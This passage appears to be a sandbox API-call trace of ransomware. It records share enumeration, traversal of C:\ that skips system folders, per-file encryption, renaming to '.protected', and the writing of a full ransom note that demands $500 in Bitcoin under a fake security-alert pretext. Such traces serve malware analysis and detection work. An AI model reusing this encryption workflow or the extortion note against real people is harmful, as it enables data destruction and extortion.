dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x48ca40, lphEnum=0xedfb04 | out: lphEnum=0xedfb04*=0x491980) returned 0x4b8 [0060.908] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x48ca60, lphEnum=0xedfb04 | out: lphEnum=0xedfb04*=0x491980) returned 0x4c6 [0060.909] WNetEnumResourceW (in: hEnum=0x47b8f8, lpcCount=0xedfb24, lpBuffer=0x48ca20, lpBufferSize=0xedfb28 | out: lpcCount=0xedfb24, lpBuffer=0x48ca20, lpBufferSize=0xedfb28) returned 0x103 [0060.911] WNetCloseEnum (hEnum=0x47b8f8) returned 0x0 Thread: id = 4 os_tid = 0x99c [0044.549] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\*") returned 8 [0044.549] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 0x4472f8 [0044.549] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Windows") returned -1 [0044.549] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Program Files") returned -1 [0044.549] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Program Files (x86)") returned -1 [0044.549] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="$Recycle.bin") returned 0 [0044.549] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0044.549] lstrcmpiW (lpString1="Boot", lpString2="Windows") returned -1 [0044.549] lstrcmpiW (lpString1="Boot", lpString2="Program Files") returned -1 [0044.549] lstrcmpiW (lpString1="Boot", lpString2="Program Files (x86)") returned -1 [0044.549] lstrcmpiW (lpString1="Boot", lpString2="$Recycle.bin") returned 1 [0044.549] lstrcmpiW (lpString1="Boot", lpString2="System Volume Information") returned -1 [0044.549] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot") returned 11 [0044.549] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0044.549] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0044.550] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\*") returned 13 [0044.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0x447b60 [0044.550] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.550] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.550] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.550] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.550] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.550] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\.") returned 13 [0044.550] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.550] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0044.550] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0044.550] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.550] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4695e0*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x4695e0*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.550] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\." (normalized: "c:\\boot\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.550] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.550] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.550] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.550] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.550] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.550] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.550] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\..") returned 14 [0044.551] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.551] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.551] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0044.551] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0044.551] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.551] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.551] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.551] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.551] lstrcmpiW (lpString1="BCD", lpString2="Windows") returned -1 [0044.551] lstrcmpiW (lpString1="BCD", lpString2="Program Files") returned -1 [0044.551] lstrcmpiW (lpString1="BCD", lpString2="Program Files (x86)") returned -1 [0044.551] lstrcmpiW (lpString1="BCD", lpString2="$Recycle.bin") returned 1 [0044.551] lstrcmpiW (lpString1="BCD", lpString2="System Volume Information") returned -1 [0044.551] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD") returned 15 [0044.551] StrStrIW (lpFirst="BCD", lpSrch=".protected") returned 0x0 [0044.551] lstrcmpW (lpString1="BCD", lpString2="RESTORE_FILES.txt") returned -1 [0044.551] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.551] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.551] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.551] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.551] lstrcmpiW (lpString1="BCD.LOG", lpString2="Windows") returned -1 [0044.551] lstrcmpiW (lpString1="BCD.LOG", lpString2="Program Files") returned -1 [0044.551] lstrcmpiW (lpString1="BCD.LOG", lpString2="Program Files (x86)") returned -1 [0044.551] lstrcmpiW (lpString1="BCD.LOG", lpString2="$Recycle.bin") returned 1 [0044.551] lstrcmpiW (lpString1="BCD.LOG", lpString2="System Volume Information") returned -1 [0044.551] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0044.551] StrStrIW (lpFirst="BCD.LOG", lpSrch=".protected") returned 0x0 [0044.551] lstrcmpW (lpString1="BCD.LOG", lpString2="RESTORE_FILES.txt") returned -1 [0044.551] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.551] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.552] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.552] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.552] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Windows") returned -1 [0044.552] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Program Files") returned -1 [0044.552] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Program Files (x86)") returned -1 [0044.552] lstrcmpiW (lpString1="BCD.LOG1", lpString2="$Recycle.bin") returned 1 [0044.552] lstrcmpiW (lpString1="BCD.LOG1", lpString2="System Volume Information") returned -1 [0044.552] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0044.552] StrStrIW (lpFirst="BCD.LOG1", lpSrch=".protected") returned 0x0 [0044.552] lstrcmpW (lpString1="BCD.LOG1", lpString2="RESTORE_FILES.txt") returned -1 [0044.552] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.552] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.552] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.552] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0044.552] StrStrW (lpFirst="BCD.LOG1", lpSrch=".txt") returned 0x0 [0044.552] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0044.552] StrStrW (lpFirst="BCD.LOG1", lpSrch=".rar") returned 0x0 [0044.552] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0044.552] StrStrW (lpFirst="BCD.LOG1", lpSrch=".zip") returned 0x0 [0044.552] ReadFile (in: hFile=0xa4, lpBuffer=0x46a660, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a660*, lpNumberOfBytesRead=0x295f654*=0x0, lpOverlapped=0x0) returned 1 [0044.553] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.553] WriteFile (in: hFile=0xa4, lpBuffer=0x46a660*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a660*, lpNumberOfBytesWritten=0x295f654*=0x0, lpOverlapped=0x0) returned 1 [0044.553] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.553] WriteFile (in: hFile=0xa4, lpBuffer=0x295f62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x295f62c*, lpNumberOfBytesWritten=0x295f654*=0x4, lpOverlapped=0x0) returned 1 [0044.553] WriteFile (in: hFile=0xa4, lpBuffer=0x46a5e8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a5e8*, lpNumberOfBytesWritten=0x295f654*=0x30, lpOverlapped=0x0) returned 1 [0044.554] CloseHandle (hObject=0xa4) returned 1 [0044.555] wnsprintfW (in: pszDest=0x46a660, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1.protected") returned 30 [0044.555] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="\\\\?\\C:\\Boot\\BCD.LOG1.protected" (normalized: "c:\\boot\\bcd.log1.protected")) returned 1 [0044.556] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.556] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Windows") returned -1 [0044.556] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Program Files") returned -1 [0044.556] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Program Files (x86)") returned -1 [0044.556] lstrcmpiW (lpString1="BCD.LOG2", lpString2="$Recycle.bin") returned 1 [0044.556] lstrcmpiW (lpString1="BCD.LOG2", lpString2="System Volume Information") returned -1 [0044.556] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0044.556] StrStrIW (lpFirst="BCD.LOG2", lpSrch=".protected") returned 0x0 [0044.556] lstrcmpW (lpString1="BCD.LOG2", lpString2="RESTORE_FILES.txt") returned -1 [0044.556] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.556] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.556] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.557] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0044.557] StrStrW (lpFirst="BCD.LOG2", lpSrch=".txt") returned 0x0 [0044.557] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0044.557] StrStrW (lpFirst="BCD.LOG2", lpSrch=".rar") returned 0x0 [0044.557] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0044.557] StrStrW (lpFirst="BCD.LOG2", lpSrch=".zip") returned 0x0 [0044.557] ReadFile (in: hFile=0xa4, lpBuffer=0x46a660, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a660*, lpNumberOfBytesRead=0x295f654*=0x0, lpOverlapped=0x0) returned 1 [0044.557] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.557] WriteFile (in: hFile=0xa4, lpBuffer=0x46a660*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a660*, lpNumberOfBytesWritten=0x295f654*=0x0, lpOverlapped=0x0) returned 1 [0044.557] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.557] WriteFile (in: hFile=0xa4, lpBuffer=0x295f62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x295f62c*, lpNumberOfBytesWritten=0x295f654*=0x4, lpOverlapped=0x0) returned 1 [0044.557] WriteFile (in: hFile=0xa4, lpBuffer=0x46a5e8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a5e8*, lpNumberOfBytesWritten=0x295f654*=0x30, lpOverlapped=0x0) returned 1 [0044.558] CloseHandle (hObject=0xa4) returned 1 [0044.558] wnsprintfW (in: pszDest=0x46a660, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2.protected") returned 30 [0044.558] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="\\\\?\\C:\\Boot\\BCD.LOG2.protected" (normalized: "c:\\boot\\bcd.log2.protected")) returned 1 [0044.558] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.558] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Windows") returned -1 [0044.559] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Program Files") returned -1 [0044.559] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Program Files (x86)") returned -1 [0044.559] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="$Recycle.bin") returned 1 [0044.559] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="System Volume Information") returned -1 [0044.559] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0044.559] StrStrIW (lpFirst="BOOTSTAT.DAT", lpSrch=".protected") returned 0x0 [0044.559] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="RESTORE_FILES.txt") returned -1 [0044.559] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.559] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.559] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.559] lstrlenW (lpString="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0044.559] StrStrW (lpFirst="BOOTSTAT.DAT", lpSrch=".txt") returned 0x0 [0044.559] lstrlenW (lpString="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0044.560] StrStrW (lpFirst="BOOTSTAT.DAT", lpSrch=".rar") returned 0x0 [0044.560] lstrlenW (lpString="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0044.560] StrStrW (lpFirst="BOOTSTAT.DAT", lpSrch=".zip") returned 0x0 [0044.560] ReadFile (in: hFile=0xa4, lpBuffer=0x46a660, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a660*, lpNumberOfBytesRead=0x295f654*=0x2800, lpOverlapped=0x0) returned 1 [0044.561] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.561] WriteFile (in: hFile=0xa4, lpBuffer=0x46a660*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a660*, lpNumberOfBytesWritten=0x295f654*=0x2800, lpOverlapped=0x0) returned 1 [0044.561] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.561] WriteFile (in: hFile=0xa4, lpBuffer=0x295f62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x295f62c*, lpNumberOfBytesWritten=0x295f654*=0x4, lpOverlapped=0x0) returned 1 [0044.561] WriteFile (in: hFile=0xa4, lpBuffer=0x46a5e8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a5e8*, lpNumberOfBytesWritten=0x295f654*=0x30, lpOverlapped=0x0) returned 1 [0044.562] CloseHandle (hObject=0xa4) returned 1 [0044.563] wnsprintfW (in: pszDest=0x46a660, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.protected") returned 34 [0044.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.protected" (normalized: "c:\\boot\\bootstat.dat.protected")) returned 1 [0044.563] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.563] lstrcmpiW (lpString1="cs-CZ", lpString2="Windows") returned -1 [0044.563] lstrcmpiW (lpString1="cs-CZ", lpString2="Program Files") returned -1 [0044.563] lstrcmpiW (lpString1="cs-CZ", lpString2="Program Files (x86)") returned -1 [0044.563] lstrcmpiW (lpString1="cs-CZ", lpString2="$Recycle.bin") returned 1 [0044.563] lstrcmpiW (lpString1="cs-CZ", lpString2="System Volume Information") returned -1 [0044.563] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ") returned 17 [0044.563] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0044.563] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0044.563] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\*") returned 19 [0044.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c00 [0044.563] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.563] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.564] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.564] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.564] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.564] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\.") returned 19 [0044.564] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.564] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.564] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.564] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.564] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.564] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.564] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.564] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\..") returned 20 [0044.564] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.564] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.564] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.564] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.564] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.564] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.564] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.564] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.564] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0044.564] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.564] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.564] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.564] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.564] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.564] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.564] FindClose (in: hFindFile=0x447c00 | out: hFindFile=0x447c00) returned 1 [0044.564] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\RESTORE_FILES.txt") returned 35 [0044.564] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\RESTORE_FILES.txt" (normalized: "c:\\boot\\cs-cz\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.565] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.565] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.565] lstrlenA 